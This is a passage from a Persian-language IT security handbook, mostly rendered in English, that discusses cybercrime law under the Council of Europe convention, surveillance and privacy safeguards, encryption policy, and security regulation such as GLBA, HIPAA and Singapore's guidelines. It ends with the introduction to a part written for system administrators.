‫ﻏﻴﺮﻣﺠــﺎﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﺭﺍﻳﺎﻧــﺔ ﺩﻳﮕــﺮﺍﻥ‪ .‬ﻣــﺜ ﹰ‬
‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ :٨٣‬ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﻪ‬
‫ﺳﻴــﺴﺘﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺷﺨــﺼﻲ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻣﺘﺮﺍﺩﻑ "ﺗﻌﺪﻱ" ﺩﺍﻧﺴﺖ‪) .‬ﺍﺯ ﻳﻚ‬
‫ﺩﻳﺪﮔﺎﻩ ﺩﻳﮕﺮ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ‪ ،‬ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ‬
‫ﺭﺍ ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺗﻬﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ‬
‫ﺍﺳﺖ(‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ ﺗﻌﺮﻳـﻒ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺤﺮﻣﺎﻧــﻪ )ﻣﺜــﻞ ﺍﻃﻼﻋــﺎﺕ ﭘﺰﺷــﻜﻲ ﻳــﺎ ﻣــﺎﻟﻲ( ﺩﺭﻳﺎﻓــﺖ‪،‬‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻳﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﻳﻚ ﻣﻌﺎﻫﺪﻩ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻣﻨﺘﺸﺮ ﻛـﺮﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﻨﺪﻫﺎﻱ ‪ ۲‬ﺗﺎ ‪ ۵‬ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺨﻠﻔـﺎﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﭼﻬﺎﺭ ﻣﻮﺭﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﺟﺮﺍﺋﻢ ﺍﺳﺎﺳـﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻧﺎﻡ ﻣﻲﺑﺮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺧـﻮﺩ ﻣﻌﺎﻫـﺪﻩ ﺑﻄـﻮﺭ‬
‫ﻣﻔﺼﻞ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﻧﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺭﺍ‬
‫ﺩﺭ ﺑﺮ ﮔﻴﺮﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﺍﺭﺍﻱ ﮔﺰﺍﺭﺷﻲ ﺗﻮﺻﻴﻔﻲ ﺍﺳﺖ ﻛﻪ ﺑـﻪ‬
‫ﺗﻌﺒﻴﺮ ﺁﻥ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻨﺪ ‪ ۲‬ﺍﻳﻦ ﻣﻌﺎﻫﺪﻩ ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﺑﻪ ﻣﻘﺎﺑﻠـﻪ‬
‫ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ )ﺩﺳﺘﺮﺳﻲ ﺗﻌﻤﺪﻱ ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺗﻤـﺎﻡ ﻳـﺎ ﺑﺨـﺸﻲ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ( ﻓﺮﺍ ﻣﻲﺧﻮﺍﻧﺪ‪ .‬ﺩﺭ ﻇﺎﻫﺮ‪ ،‬ﺍﻳﻦ ﻣﺎﺩﻩ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛـﻪ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺭﺳﺎﻝ ﻣﻲ ﻧﻤﺎﻳﻨﺪ ﻣﺠﺮﻡ ﻣﻲ ﺷـﻤﺎﺭﺩ‪،‬‬
‫‪78 Substantive Law‬‬
‫‪79 Procedural Law‬‬
‫‪Data Interception‬‬
‫‪Data Interference‬‬
‫‪80‬‬
‫‪81‬‬
‫‪System Interference‬‬
‫‪Illegal Access‬‬
‫‪82‬‬
‫‪83‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﻣﺘـﺼﻮﺭ‬
‫ﺍﺳﺖ‪ ،‬ﻭ ﺑﺮﺍﻱ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻧﻴـﺰ ﻧﺎﻣﻬـﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ‬
‫ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻣــﺎ ﺩﺭ ﻣﺠﻤــﻮﻉ‪ ،‬ﻗــﻮﺍﻧﻴﻨﻲ ﻛــﻪ ﺩﺭ ﻣــﻮﺭﺩ ﺟــﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻫﺴﺘﻨﺪ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﺩﺳﺘﺔ ﺯﻳﺮ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪:‬‬
‫•‬
‫ﺗﺪﺍﺧﻞ ﺳﻴﺴﺘﻢ‪ :٨٢‬ﺟﻠﻮﮔﻴﺮﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﺯ ﻓﻌﺎﻟﻴﺖ ﺳﻴـﺴﺘﻢ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺑــﺼﻮﺭﺕ ﺗﻌﻤــﺪﻱ ﺍﺯ ﻃﺮﻳــﻖ ﻭﺭﻭﺩ‪ ،‬ﺍﻧﺘﻘــﺎﻝ‪،‬‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﺣﺬﻑ‪ ،‬ﻳﺎ ﺗﻐﻴﻴـﺮ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ .‬ﺍﻳـﻦ ﺑﻨـﺪ‬
‫ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺍﺯ ﻗﺒﻴﻞ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﻳﺎ ﻭﺭﻭﺩ‬
‫ﻭﻳﺮﻭﺱ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﺑﺎ ﻛـﺎﺭﻛﺮﺩ ﻃﺒﻴﻌـﻲ‬
‫ﺁﻥ ﺗﺪﺍﺧﻞ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺷﻮﺩ‪" .‬ﺁﺳﻴﺐ ﺟﺪﻱ" ﻋﻨـﺼﺮﻱ‬
‫ﺍﺳﺖ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺒﻬﻜﺎﺭﺍﻧـﻪ ﺭﺍ ﺍﺯ ﺭﻓﺘﺎﺭﻫـﺎﻱ ﻣﻌﻤـﻮﻟﻲ‬
‫ﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺜﻞ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـ ﹺ‬
‫ﻧﺎﺧﻮﺍﺳﺘﻪ ﻣﺠﺰﺍ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٤٨‬‬
‫ﭼﺮﺍﻛﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﺑﺪﻭﻥ ﺍﺟﺎﺯﻩ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ )ﻭ ﻳـﺎ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﭘـﺴﺘﻲ ﮔﻴﺮﻧـﺪﻩ( ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﺑﺮﺍﺳﺎﺱ ﺍﻳﻦ ﺗﻔـﺴﻴﺮ‪ ،‬ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﻭﺷﻦ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ "ﺑﺪﻭﻥ ﺍﺟـﺎﺯﻩ" ﻫﻤـﺎﻥ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻌﻤﻮﻝ ﻭ ﺫﺍﺗـﻲ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ ﻛـﻪ ﺑﻄـﻮﺭ ﺭﻭﺯﻣـﺮﻩ‬
‫ﻼ ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﻪﻫــﺎﻱ‬
‫ﻫﻤــﻮﺍﺭﻩ ﺩﺭ ﺁﻥ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ؛ ﻣــﺜ ﹰ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻔﺤﺎﺕ ﻭﺏ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﻣﺴﺘﻘﻴﻢ ﻳﺎ ﻓﺮﺍﻣﺘﻦ‪ ،٨٤‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪cookie‬ﻫـﺎ ﻳـﺎ‬
‫‪bot‬ﻫﺎ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
Computer-facilitated crimes
Computer crime includes not only activities that an offender carries out against computers, but also crimes that are facilitated by the use of computers. Theft and fraud, for example, are crimes that every legal system addresses in the offline world, but theft and fraud also take place on the Internet. Likewise, offences such as literary and intellectual theft or the distribution of child pornography are not limited to computer crime; they are offences that are facilitated by the use of computers. In many cases the penalties for existing crimes are also applied to Internet crimes. A careful analysis of the various elements of such crimes requires a comparative study of existing criminal laws as they apply to crime in cyberspace, and for that purpose it is also necessary to distinguish between computer offences and crimes facilitated by computers.
Articles 7 to 10 of the Council of Europe convention move away from this concept and deal more generally with crimes in which a computer is used to facilitate something that is also treated as a crime outside the Internet (acts such as forgery, fraud, the distribution, production or possession of child pornography, and copyright infringement). In some legal systems it may be unnecessary to apply special rules to computer-facilitated crimes. Such laws may also, by setting penalties that are not very proportionate, make crimes committed in cyberspace appear worse than comparable crimes in the real world.
[84] Hypertext
Applying the basic concepts of criminal law
Countries may also want to apply the usual concepts of criminal law, such as "aiding and abetting" or "intent", to electronic crime. If ordinary criminal law has defined the concept of "intent to offend", the same concept can be applied to electronic crimes. For example, sending a virus with the intent of denying service may be treated as a "crime" or as "intent to commit a crime", even if the virus does not work properly. In the same way, if the law has defined "aiding and abetting", the same definitions can be used for electronic crime, so that, for example, a person who deliberately creates a virus is still held liable for the damage that virus does to data and to the network, even if it was another person who introduced the virus into the network.
Protecting privacy
Attention to electronic crime often raises questions such as: what are the rules under which the government obtains the right of access to electronic communications and computer data, data that may be evidence of electronic crimes and of other kinds of offences? Many countries have legal procedures that allow the government to examine information stored on computers. These procedures may take the form of court orders to examine stored data, or warrants to seize and investigate computers and computer data. Many countries also permit the real-time interception [85] of communications and of transmission data, which indicate the origin and destination of communications. An important part of the Council of Europe convention on electronic crime obliges governments to use specific laws for investigating and tracing computer records, intercepting communications, and having any kind of computer record reported to the government.
According to UN resolution 55/63 (December 2000), when countries pass laws for investigating communications and computer data, they must also protect individual freedoms and privacy. In 1990 the Eighth United Nations Congress on the Prevention of Crime and the Treatment of Offenders put forward proposals on the use of assessment methods, clear laws and international cooperation in identifying electronic crimes. In 1995 the United Nations published its manual on the prevention and control of computer-related crime. This detailed document raised a broad range of issues related to technology crime, including procedural law, substantive law, international cooperation, data protection, security and privacy.
Compelled disclosure of data stored on computers, and government interception of communications and transmission data, lead to violations of individual privacy, and the need for protective procedures is therefore felt more than ever. As the OECD states in its guidelines on the security of networks and information systems: "Security measures should be implemented in a manner consistent with the values recognized by democratic societies, including the freedom to exchange thoughts and ideas, the free flow of information, the confidentiality of information and communications, the appropriate protection of personal information, and transparency." The European Commission states that the protection of privacy is a core policy of the European Union, and that this is also set out in Article 8 of the European Convention on Human Rights. Articles 7 and 8 of the Charter of Fundamental Rights of the EU [86] likewise provide for respect for private and family life, communications and personal data. In developing and transitional societies, unlimited government surveillance can completely destroy the notion of trust on the Internet.
In this connection the Council of Europe convention states explicitly that the surveillance of communications and the examination of stored data are permitted only to the extent that they do not violate privacy as defined in the European Convention on Human Rights. Article 15 of the convention on electronic crime contains the following points:
1. Each organization must ensure that due attention has been paid to the drafting, implementation and application of these procedures in local rules and laws, which are drawn up to provide adequate protection of human rights and freedoms, including the rights set out in the 1950 Council of Europe Convention for the Protection of Human Rights and Fundamental Freedoms and other international human rights instruments.
2. These rules must, to the extent that their nature requires, include judicial and other independent supervision, regulate how they are applied, and provide for reducing the scope and time limits of the procedures.
Surveillance standards
The Council of Europe convention does not specify particular surveillance procedures tied to the European human rights charter; rather, these can be seen in the decisions of the European Court of Human Rights (summarized below) and in the surveillance laws of countries such as Canada and the United States, which have strong and independent procedures for adjudication and for the protection of privacy. In developing and transitional societies, where clear and well-defined laws on investigation, seizure and surveillance do not exist even for the offline world, serious attention must be paid in the electronic field to developing strong standards under government oversight.
In many of the world's advanced legal systems the interception of electronic communications is permitted, but under clear legal standards; and even then sufficient grounds are required, which in most legal systems means approval by a judge.
Governments that deal with interception and access to data should pay attention to the operational standards for government access to communications and computer data. International experience is a useful guide here. On the basis of national and international standards, the following practices can make the lawful interception of communications possible:
[85] Realtime Interception
[86] Charter of Fundamental Rights of the EU
• Interception standards should be transparent and the laws publicly available, and they should inform citizens fully, clearly and with the necessary precision of how, and under what conditions, surveillance takes place;
• Interception should be authorized in writing by an independent authority (preferably a judge), on the basis of a written request and the presentation of valid and acceptable grounds and documents;
• Surveillance should be limited to the investigation of serious and specific cases;
• Authorization should be given only where there are strong grounds showing that an investigation into offences is necessary;
• Interception should be authorized only where the use of other techniques is not sufficient to obtain the information;
• The persons and matters to be placed under surveillance should be specified in full detail, and general descriptions should in no way be acceptable;
• The rules should be technology-neutral (all communications, whether telephone, video or data, wireline or wireless, digital or analog, should be treated in the same way);
• The scope and duration of surveillance should be limited, and should in no case exceed the time needed to obtain the information sought;
• Surveillance should be carried out in a way that entails the least possible violation of privacy;
• The law should set out how information obtained through interception may be used, and that information should not be used for other purposes;
• The law should specify the procedures for issuing a ruling in respect of the accused;
• The law should determine whether or not all persons who are placed under investigation must be notified of the investigation once it is over, regardless of its outcome; and
• If, under the standards, a person's privacy is violated in the course of an interception operation, the law should require compensation for all damage caused.
Many of these points also apply during investigations and when law enforcement agents seize computer data.
Data retention and other government mandates
A number of developed countries (including the United States) have applied specific rules to ordinary telephones, and in some countries Internet service providers (ISPs) [87] must place all communication networks under government surveillance. In addition, some countries are seeking to pass laws under which service providers would be required to keep the traffic data for all communications for a minimum period (a rule referred to as "data retention"). These rules have been highly controversial and have been criticized for threatening the privacy of citizens and the security of networks, and for imposing considerable costs on service providers. A fuller examination of surveillance rules is beyond the scope of this book. It should nevertheless be noted that the Council of Europe convention on electronic offences does not impose technical standards or data retention requirements on service providers. The convention provides only procedures for preserving, accessing or obtaining business data, and it makes use of the technology that companies already have. This does not require any change in technology or in business activities. In 2002 the European Union issued a directive on privacy in communications that allowed member states to use data retention measures but did not oblige them to do so.
[87] Internet Service Providers
Anonymity [88]
The Council of Europe convention on electronic offences has identified another important right relating to privacy: the right to communicate anonymously [89]. The explanatory report of the convention makes clear that it does not expect service providers to keep and register the names of their subscribers. Under the convention, therefore, service providers are not required to register identity information, to verify the identity of subscribers, or to resist the use of pseudonyms by users. In 2003 the Council of Europe published a declaration on freedom of communication on the Internet to the following effect: "In order to increase the free dissemination of information and ideas, member states should respect the ideas of users and not their identity." In addition, in 2001 the European Commission recognized anonymous activity and, in a communication on creating a safer information society, stated: "Many kinds of authentication mechanisms are needed for our different needs in the environment with which we interact. In some environments it may be necessary or preferable to remain anonymous." In its 2001 studies on network and computer security, the European Commission stated that authentication [90] on the network should also allow for anonymity, since in many services the identity of the user does not need to be established.
Encryption
Encryption [91] is a useful tool for maintaining security on the Internet. As the European Commission noted in 2001: "The use of encryption technologies is essential, especially with the growth of wireless communications." In view of this, the general direction of national policy on encryption should be to remove or reduce laws that restrict the use of encryption. In recent years, developed countries that had previously sought to control encryption have concluded that, in general, encryption increases security. The encryption policy in the 1997 OECD guidelines and in the European Commission's 1998 report strongly supports unrestricted access to encryption products and services.
In the late 1990s Canada, Germany, Ireland and Finland drew up national cryptography policies based on the OECD guidelines in order to support the free use of encryption. France, which had a long history of restricting encryption, completely changed this policy in January 1999 and announced that encryption could be used without restriction. In December 1997 Belgium amended its 1994 law restricting encryption. The United States, which had limited encryption by restricting trade in encryption products and services, lifted all restrictions on these products in 2000.
Law and regulation
In many countries policymakers have concluded that the pressure of the consumer market alone is not enough to reduce electronic security threats effectively and, as the European Commission has pointed out, that government intervention is also necessary, because the market does not create sufficient incentive to pay the necessary attention to security: market prices do not always accurately reflect the costs and benefits of investing in security; usually neither producers nor consumers can bear all the consequences of the downturn that results from neglecting security measures; and, moreover, control over the Internet is dispersed and, given the complexity of networks, it is difficult for users to assess the potential risks. Many of the critical infrastructures that depend heavily on computer systems have a long history of regulation, such as rules on safety, competition and environmental impact. Today lawmakers increasingly include cyber security in the list of matters that governments must attend to.
Regulation nevertheless carries risks. In some respects the Internet is known as an almost unregulated medium of communication. In general, the global trend in the latter part of the past decade has been toward the deregulation of communication networks. Competition and innovation support the development of new services and technologies, reduce resources and increase access to communication technology. When technology is changing rapidly, government regulations obstruct the implementation of innovative security solutions.
[88] Anonymity
[89] The Legitimity of Anonymous Communications
[90] Authentication
[91] Encryption
This raises the fundamental question: what is the best way to raise the level of security? In general, and as a basic principle, the government should not impose technology rules on the operators and critical infrastructures of the private sector. Many people believe that technology-related directives and rules are ineffective and sometimes even harmful.
Instead, one approach is to impose general requirements to maintain security. This approach, which grew out of the concept of privacy protection, became mandatory in all sectors that collected and processed personal data. Another approach is to focus on specific economic sectors. The United States, for example, has included requirements for protecting the security of personal data in the privacy rules it has set for the health care and financial services sectors. Singapore has also focused on financial services, but not from the standpoint of privacy protection: Singapore's electronic security guidelines for financial services institutions address security concerns directly, rather than threats to privacy. There are also different ways of turning general security requirements into step-by-step security measures. One approach to government electronic security regulation is to emphasize processes rather than technologies. Another approach is to issue guidelines. These approaches can complement one another.
Europe has begun applying new security rules in all sectors that collect and process personal information. Article 17 of the European Union's data protection directive requires holders of personal data to apply appropriate organizational and technical measures to protect that data against destruction, alteration, disclosure or unlawful access (particularly where the processing involves the transmission of data over networks). The directive also states that "such measures shall ensure a level of security appropriate to the inherent risks of data processing". Canada has adopted a similar approach. There, under the Personal Information Protection and Electronic Documents Act [92], private-sector companies are required to put specific security safeguards in place to protect personal information.
The European Union has published a more detailed directive dealing with protection rules in the electronic communications industry. Article 4 of this directive specifies that a provider of electronic communications services "must take measures to safeguard the security of its services and, if necessary, the services of the providers of public communications networks (with respect to network security)." Second, providers of public electronic communications must warn subscribers of any kind of security threat and, "where the risk lies outside the scope of the power and authority of the service providers, take into account any change, including the likely costs."
How are these general requirements put into practice? Singapore has a particular approach. The Monetary Authority of Singapore (MAS) [93] issued a comprehensive set of electronic security recommendations in its Technology Risk Management Guidelines [94] for financial institutions. These guidelines were intended to promote and improve sound processes for managing technology risk and the use of security practices, but compliance was not mandatory for anyone. Instead, as the guidelines state: "The Monetary Authority of Singapore intends to incorporate these practices into its supervision of the technology risk assessments and security measures of financial institutions. Any institution that implements these guidelines will gain particular benefits from MAS, and financial institutions are thereby encouraged to work toward compliance with the guidelines." The guidelines are to be regarded as a standard for institutions. The following list sets out the "musts" for the security practices of financial institutions:
• Software systems and firewalls must be configured to the highest level of security required, and steps must be taken to harden and update them and to carry out the other measures recommended by system vendors;
• All default passwords on new systems must be changed immediately after installation, because attackers are widely aware of them;
• Firewalls must be installed between internal and external networks, and also between geographically separate sites; and
• Antivirus software must be installed and run.
The United States has taken a different approach, one that relies on processes rather than on technology-based practices. Thus the Financial Services Modernization Act [95] (enacted in 1999, and known by the name of its main sponsors in Congress as the Gramm-Leach-Bliley Act) states that "each financial institution has a continuing obligation to respect the privacy of its customers and must protect the security and confidentiality of its customers' nonpublic personal information." Under this law, those who run financial institutions need to adopt administrative and technical rules and also provide physical safeguards for information security. The important point is that these rules do not specify which technical components are needed for protection; the law therefore leaves decisions about specific security measures to the organization.
Under this law, the directives adopted by the regulatory agencies for the financial services industry are implemented by banks. The law does not prescribe the technical measures required, but says that the security program must:
• Identify the reasonably foreseeable internal and external threats that lead to unlawful disclosure, misuse, alteration or destruction of customer information or customer information systems.
• Assess the likelihood and potential of these threats materializing, taking into account the sensitivity of customer information.
• Assess the sufficiency of policies, processes, customer information systems and other measures for controlling risk.
Information security programs are designed to control risks and are proportionate to the sensitivity, complexity and scope of impact of the information. Implementing the rules requires a broad set of security measures that must be applied properly. These measures are:
• Access controls on customer information systems (authentication and access permissions);
• Restrictions on access to physical locations;
• Encryption of electronic customer information;
• Changes to management procedures;
• The use of dual control procedures (a policy of segregation of duties and background checks) for employees who have access to customer information;
• Intrusion monitoring systems [96];
• Intrusion response programs [97]; and
• Measures to protect against the destruction, tampering or loss of customer information.
In addition, under these rules staff must be trained to implement the security programs. These controls, systems and procedures must be reviewed regularly in light of changes in technology, the sensitivity of customer information, internal and external threats to information, and changes in the organization's business arrangements, such as a merger or alliance with another organization, or work being carried out by individuals or companies outside the organization. These rules require the board of directors of a financial institution to approve the organization's written security program and to oversee the design, implementation and maintenance of the plan (including responsibility for implementing the plan and reviewing management reports).
Similar rules from the National Trade Commission require the financial institutions under its jurisdiction to prepare a plan under which institutions must:
• Designate one or more employees to provide security;
• Identify and assess, in each area of the company's operations, the risks that threaten customer information, and evaluate the effectiveness of the current system for controlling those risks;
• Design and implement a safeguards program and test and revise it regularly;
• Select appropriate service providers and contract with them to implement security systems; and
• Evaluate and adjust the programs under real conditions (such as changes in the structure or operations of the organization) and, in light of the test results, evaluate and adjust the monitoring process as well.
[92] Personal Information Protection And Electronic Documents Act
[93] Monetary Authority of Singapore
[94] Technology Risk Management Guideline
[95] Financial Services Modernization
[96] Intrusion Monitoring Systems
[97] Intrusion Response Programs
A similar approach can be seen in the United States Health Insurance Portability and Accountability Act [98], which requires health care institutions to implement security measures to ensure that patient information stored electronically always remains confidential and protected from unlawful access. Under this law institutions are required to maintain reasonable and appropriate administrative, physical and technical safeguards so that the integrity and confidentiality of individuals' medical records are preserved against anticipated security threats and unauthorized access. The law applies to the storage and transmission of data and has 28 standards and 41 implementation specifications. It states that security processes and procedures must take into account the technical capabilities of record systems, the cost of security measures, the training needs of staff, and the value of reviewing audit trails in computer environments. The security rules identify the safeguards that are "required" and those that are "addressable". The main points of the security rules to which institutions must attend are:
• Ensure the confidentiality, integrity and availability of the information that the institution creates, receives, maintains or transmits;
• Protect the system against threats that endanger the security or integrity of the information;
• Prevent any use or disclosure of information that cannot be justified under the security rule; and
• Ensure that the workforce complies with the security rules.
This law is nevertheless flexible:
• Covered entities may use security measures that allow them to implement these standards reasonably and appropriately;
• In deciding which security measures to use, the following must be taken into account:
o Its size, complexity and extent;
o The technical infrastructure, hardware, and software security capabilities;
o The cost of the security measures; and
o The likelihood and criticality of each risk.
[98] United State's Health Insurance Portability and Accountability Act
Another approach requires companies to disclose weaknesses and flaws publicly, in order to improve the performance of systems and raise the level of security. European Union rules require providers of telecommunications services to inform subscribers of the risks they face as a result of a security breach in the network (and of the likely cost). As an example, in July 2003 a law was passed in the state of California under which any company that holds personal information about California residents is required to inform them of the possible risks arising from a breach of security and the resulting unlawful access to that information.
Part Five: IT Security and Technical Administrators
Chapter 1. Introduction
Chapter 2. Security for Administrators
Chapter 3. Physical Security
Chapter 4. Information Security
Chapter 5. Identification and Authentication
Chapter 6. Server Security
Chapter 7. Network Security
Chapter 8. Types of Attacks and How to Counter Them
Chapter 9. Intrusion Detection and Management
Chapter 10. Special Notes on Different Platforms
Chapter One
Introduction
Summary of Parts 1 to 4
Now that we have reached the most technical book, it is useful to review what was discussed in Parts 1 to 4. Recall that:
Part 1 of the book gave a brief introduction to the general issues of security in the digital age. It described the breadth of IT security issues and some of the hostile acts that take place in computer and network environments, and explained why security policies and security knowledge are essential for individuals, businesses and other users.
Part 2 addressed the general concerns of individual users, computer resources and the network. It covered the key issues of individual security and offered technical guidelines which, if applied correctly, minimize the threat of a security intrusion.
Part 3 covered the administrative and policy aspects of security from an organizational point of view. In that chapter we said that, with the opportunities offered by the new digital media, small and medium-sized enterprises (SMEs) in developing countries are moving toward the point where they can influence the development of today's world markets. Appropriate policies and the effective implementation of security processes will minimize the risk of accidental and deliberate loss of information and provide tools for identifying attacks and repairing security flaws. Security policies for SMEs also need to include elements such as user authentication policies in interactive environments such as electronic commerce, electronic transactions and electronic government. That part offered suggestions on how robust security rules can be established and extended across organizational environments.
Part 4 emphasizes security issues and legislative initiatives, and states that these issues must be understood and implemented at the level of government. In addition to securing its own information assets, the government is responsible for making policy to secure and protect the national information infrastructure. Governments must also anticipate what effect the growth of the information infrastructure will have on their legal systems. That part identifies some of the key questions facing policymakers and leaders in the developing world and presents examples of policies from the global community that can serve as a guide for those involved in new legislative efforts for cyberspace [1].
Summary of Part Five, with notes on technical background
Part 5 has been prepared to help system and network administrators carry out their duties effectively. It provides detailed information on the security issues that need to be understood and followed up at a high technical level, including:
• A classification of security threats, including the attack methods used to break into systems and programs.
• Monitoring the traffic of sensitive systems and of the network so that attack activity can be identified and, where possible, repelled.
• Evaluating the results of security assessments while policies and processes are being developed, and analyzing the results of logs [2] and other current records after those security measures have been implemented.
• Responding to an attack, recovering from an intrusion, and learning from past experience.
[1] Cyber Space
‫ﺑﺨﺶ ‪ ۵‬ﺑﺎ ﭼﻬﺎﺭ ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﺁﻥ ﺟﻬﺖ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺽ ﻣﻲﻛﻨﺪ ﺧﻮﺍﻧﻨﺪﻩ ﺍﺯ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
